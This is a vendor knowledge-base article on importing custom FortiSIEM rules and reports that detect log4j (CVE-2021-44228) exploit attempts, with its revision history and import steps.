| Description |
This article describes how to use custom Rules and Reports to help detect activity related to the log4j vulnerability CVE-2021-44228.
What is included in Fortinet_FortiSIEM-log4j-Detection-v1.zip?
2) FortiSIEM_log4j_Reports_v2.1.xml.
These Reports can be run on a schedule or on-demand and help identify exploit attempts detected by FortiGate's IPS, or Events categorised as Permitted Traffic with the URI or HTTP content (see rules for specific attributes) that match a particular regex pattern.
For more information about this attack, see the following FortiGuard Outbreak Alert: FortiGuard Outbreak Alert - Log4j2 Vulnerability
Updated: 2021-12-17 - revision 2, changes to the "Log4J Exploit Request Detected By Regex" Rule to increase the scope and reduce false positives. Updated: 2021-12-20 - no change in content, but revised Report file naming to v2 in line with Solution steps below. The report content remains the same. Updated: 2021-12-20 - updated Reports to version 2.1. Provides better support for import on some FortiSIEM versions. |
| Scope | The custom Rules and Reports provided can be used in FortiSIEM 6.x. |
| Solution |
All screenshots provided below for illustration purposes are taken from FortiSIEM 6.3.2.
1) Download the Fortinet_FortiSIEM-log4j-Detection-v2.zip file (contains 2 file).
2) Unzip Fortinet_FortiSIEM-log4j-Detection-v2.zip
3) Use FortiSIEM_log4j_Reports_v2.1.xml as the file to import the Reports
4) Use FortiSIEM_log4j_Rules_v2.xml as the file to import the Rules
Imported and enabled Rules
Imported Reports
|
